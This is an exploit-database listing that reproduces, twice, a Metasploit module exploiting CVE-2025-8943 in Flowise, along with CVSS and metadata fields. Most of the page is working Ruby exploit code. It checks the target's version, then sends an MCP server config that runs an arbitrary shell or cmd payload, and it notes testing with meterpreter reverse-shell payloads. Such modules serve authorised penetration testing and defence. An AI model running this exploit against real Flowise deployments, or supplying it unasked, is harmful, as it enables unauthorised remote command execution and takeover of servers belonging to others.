📄 Flowise Custom MCP Remote Code Execution_PACKETSTORM:211931

9.8 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

This Metasploit module exploits a remote code execution vulnerability in Flowise versions greater than or equal to 2.2.7-patch.1 and less than 3.0.1. The vulnerability exists in the customMCP endpoint /api/v1/node-load-method/customMCP located in...

Visit Original Source

Basic Information

ID PACKETSTORM:211931

Published Nov 24, 2025 at 00:00

Affected Product

Affected Versions ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HTTP::Flowise
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Flowise Custom MCP Remote Code Execution',
'Description' => %q{
This module exploits a remote code execution vulnerability in Flowise versions >= 2.2.7-patch.1
and < 3.0.1. The vulnerability exists in the customMCP endpoint (/api/v1/node-load-method/customMCP)
located in packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.ts and packages/components/nodes/tools/MCP/core.ts,
which allows users to execute arbitrary commands via StdioClientTransport by using the 'x-request-from: internal' header.
When FLOWISE_USERNAME and FLOWISE_PASSWORD are not configured, the exploit works unauthenticated. If Basic Auth is
enabled, the FLOWISE_USERNAME and FLOWISE_PASSWORD options must be set to provide credentials.
},
'Author' => [
'Assaf Levkovich', # Vulnerability discovery (JFrog)
'Valentin Lobstein <chocapikk[at]leakix.net>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2025-8943'],
['URL', 'https://research.jfrog.com/vulnerabilities/flowise-os-command-remote-code-execution-jfsa-2025-001380578/']
],
'Platform' => %w[unix linux win],
'Arch' => [ARCH_CMD],
'Targets' => [
[
'Unix/Linux Command',
{
'Platform' => %w[unix linux],
'Arch' => ARCH_CMD,
'DefaultOptions' => {
'FETCH_COMMAND' => 'WGET'
}
# tested with cmd/linux/http/x64/meterpreter_reverse_tcp
}
],
[
'Windows Command',
{
'Platform' => 'win',
'Arch' => ARCH_CMD
# tested with cmd/windows/http/x64/meterpreter_reverse_tcp
}
]
],
'Privileged' => false,
'DisclosureDate' => '2025-08-14',
'DefaultTarget' => 0,
'DefaultOptions' => {
'RPORT' => 3000
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS]
}
)
)

register_options([
OptString.new('FLOWISE_USERNAME', [false, 'Flowise username for Basic Auth (required if env var is set)', '']),
OptString.new('FLOWISE_PASSWORD', [false, 'Flowise password for Basic Auth (required if env var is set)', ''])
])
end

def check
version = flowise_get_version
return CheckCode::Unknown('Could not retrieve Flowise version') unless version

print_status("Flowise version detected: #{version}")

# Vulnerability introduced in 2.2.7-patch.1 (March 14, 2025) and fixed in 3.0.1 (May 29, 2025)
# Note: Rex::Version parses "2.2.7-patch.1" as "2.2.7.pre.patch.1", so we check >= 2.2.7
if (version >= Rex::Version.new('2.2.7') || version.to_s.include?('2.2.7')) && version < Rex::Version.new('3.0.1')
return CheckCode::Appears('(affected: >= 2.2.7-patch.1 and < 3.0.1)')
end

CheckCode::Safe("Version #{version} is not vulnerable")
end

def execute_command(cmd, _opts = {})
command = 'sh'
args = ['-c', cmd]

if target.platform.names.include?('Windows')
command = 'cmd'
args = ['/c', cmd]
end

payload_data = {
'inputs' => {
'mcpServerConfig' => {
'command' => command,
'args' => args
}
},
'loadMethod' => 'listActions'
}

opts = {
username: datastore['FLOWISE_USERNAME'],
password: datastore['FLOWISE_PASSWORD']
}

flowise_send_custommcp_request(payload_data, opts)
end

def exploit
fail_with(Failure::PayloadFailed, 'Failed to run payload') unless execute_command(payload.encoded)
end
end

{
    "lastseen": "2025-11-24T16:38:22",
    "description": "This Metasploit module exploits a remote code execution vulnerability in Flowise versions greater than or equal to 2.2.7-patch.1 and less than 3.0.1. The vulnerability exists in the customMCP endpoint /api/v1/node-load-method/customMCP located in...",
    "published": "2025-11-24T00:00:00",
    "modified": "2025-11-24T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Flowise Custom MCP Remote Code Execution",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:211931",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-8943"
    ],
    "sourceData": "##\n    # This module requires Metasploit: https://metasploit.com/download\n    # Current source: https://github.com/rapid7/metasploit-framework\n    ##\n    \n    class MetasploitModule < Msf::Exploit::Remote\n      Rank = ExcellentRanking\n    \n      include Msf::Exploit::Remote::HttpClient\n      include Msf::Exploit::Remote::HTTP::Flowise\n      prepend Msf::Exploit::Remote::AutoCheck\n    \n      def initialize(info = {})\n        super(\n          update_info(\n            info,\n            'Name' => 'Flowise Custom MCP Remote Code Execution',\n            'Description' => %q{\n              This module exploits a remote code execution vulnerability in Flowise versions >= 2.2.7-patch.1\n              and < 3.0.1. The vulnerability exists in the customMCP endpoint (/api/v1/node-load-method/customMCP)\n              located in packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.ts and packages/components/nodes/tools/MCP/core.ts,\n              which allows users to execute arbitrary commands via StdioClientTransport by using the 'x-request-from: internal' header.\n              When FLOWISE_USERNAME and FLOWISE_PASSWORD are not configured, the exploit works unauthenticated. If Basic Auth is\n              enabled, the FLOWISE_USERNAME and FLOWISE_PASSWORD options must be set to provide credentials.\n            },\n            'Author' => [\n              'Assaf Levkovich', # Vulnerability discovery (JFrog)\n              'Valentin Lobstein <chocapikk[at]leakix.net>' # Metasploit module\n            ],\n            'License' => MSF_LICENSE,\n            'References' => [\n              ['CVE', '2025-8943'],\n              ['URL', 'https://research.jfrog.com/vulnerabilities/flowise-os-command-remote-code-execution-jfsa-2025-001380578/']\n            ],\n            'Platform' => %w[unix linux win],\n            'Arch' => [ARCH_CMD],\n            'Targets' => [\n              [\n                'Unix/Linux Command',\n                {\n                  'Platform' => %w[unix linux],\n                  'Arch' => ARCH_CMD,\n                  'DefaultOptions' => {\n                    'FETCH_COMMAND' => 'WGET'\n                  }\n                  # tested with cmd/linux/http/x64/meterpreter_reverse_tcp\n                }\n              ],\n              [\n                'Windows Command',\n                {\n                  'Platform' => 'win',\n                  'Arch' => ARCH_CMD\n                  # tested with cmd/windows/http/x64/meterpreter_reverse_tcp\n                }\n              ]\n            ],\n            'Privileged' => false,\n            'DisclosureDate' => '2025-08-14',\n            'DefaultTarget' => 0,\n            'DefaultOptions' => {\n              'RPORT' => 3000\n            },\n            'Notes' => {\n              'Stability' => [CRASH_SAFE],\n              'Reliability' => [REPEATABLE_SESSION],\n              'SideEffects' => [IOC_IN_LOGS]\n            }\n          )\n        )\n    \n        register_options([\n          OptString.new('FLOWISE_USERNAME', [false, 'Flowise username for Basic Auth (required if env var is set)', '']),\n          OptString.new('FLOWISE_PASSWORD', [false, 'Flowise password for Basic Auth (required if env var is set)', ''])\n        ])\n      end\n    \n      def check\n        version = flowise_get_version\n        return CheckCode::Unknown('Could not retrieve Flowise version') unless version\n    \n        print_status(\"Flowise version detected: #{version}\")\n    \n        # Vulnerability introduced in 2.2.7-patch.1 (March 14, 2025) and fixed in 3.0.1 (May 29, 2025)\n        # Note: Rex::Version parses \"2.2.7-patch.1\" as \"2.2.7.pre.patch.1\", so we check >= 2.2.7\n        if (version >= Rex::Version.new('2.2.7') || version.to_s.include?('2.2.7')) && version < Rex::Version.new('3.0.1')\n          return CheckCode::Appears('(affected: >= 2.2.7-patch.1 and < 3.0.1)')\n        end\n    \n        CheckCode::Safe(\"Version #{version} is not vulnerable\")\n      end\n    \n      def execute_command(cmd, _opts = {})\n        command = 'sh'\n        args = ['-c', cmd]\n    \n        if target.platform.names.include?('Windows')\n          command = 'cmd'\n          args = ['/c', cmd]\n        end\n    \n        payload_data = {\n          'inputs' => {\n            'mcpServerConfig' => {\n              'command' => command,\n              'args' => args\n            }\n          },\n          'loadMethod' => 'listActions'\n        }\n    \n        opts = {\n          username: datastore['FLOWISE_USERNAME'],\n          password: datastore['FLOWISE_PASSWORD']\n        }\n    \n        flowise_send_custommcp_request(payload_data, opts)\n      end\n    \n      def exploit\n        fail_with(Failure::PayloadFailed, 'Failed to run payload') unless execute_command(payload.encoded)\n      end\n    end",
    "sourceHref": "https://packetstorm.news/download/211931",
    "cvss": {
        "score": 9.8,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/211931/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply